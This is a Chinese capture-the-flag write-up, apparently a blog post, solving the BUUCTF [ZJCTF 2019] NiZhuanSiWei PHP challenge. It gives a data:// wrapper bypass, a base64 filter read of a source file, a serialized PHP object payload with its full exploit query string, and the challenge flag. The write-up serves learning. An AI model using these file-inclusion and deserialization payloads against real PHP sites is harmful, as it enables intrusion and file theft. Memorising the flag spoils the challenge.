BUUCTF [ZJCTF 2019]NiZhuanSiWei 1解题思路

[ZJCTF 2019]NiZhuanSiWei 1

打开实例,发现为代码审计,确认为文件包含漏洞

在这里插入图片描述

需要三个参数text、file、password,首先是text验证,逻辑显示text必须有值,且读取文件内容得是welcome to the zjctf

采用读取本地文件绕过,在E盘新建文件

在这里插入图片描述

发现无效

在这里插入图片描述

尝试data流

?text=data://,welcome to the zjctf

在这里插入图片描述

成功绕过,接下来是file绕过,逻辑显示不能包含flag,注意到旁边注释useless.php,尝试读取页面内容

在这里插入图片描述

在这里插入图片描述

读取失败,尝试采用base64编码读取,读取成功

在这里插入图片描述

获得一串base64

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo

解码为一段php代码

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

在这里插入图片描述

代码显示flag在flag.php中,此前注意到源代码的unserialize方法,那最后的password参数就是反序列化了

在这里插入图片描述

构造payload,注意到有__tostring方法,所以只要直接传flag.php字符串就行

<?php
class Flag{
    public $file = 'flag.php';
}
$select = new Flag();
$res=serialize(@$select);   
echo $res;

运行获得序列化字符串

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述

运行,纳尼,没反应??

在这里插入图片描述

怀疑是与file的内容冲突了,把file改回来,显示成功

?text=data://,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述

发现flag没显示,查看源代码,发现flag

在这里插入图片描述

flag{8cfd1d3e-077f-48e6-aba4-07bde718c28b}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

成为别人口中的IT高手

写文章不容易,充充电吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值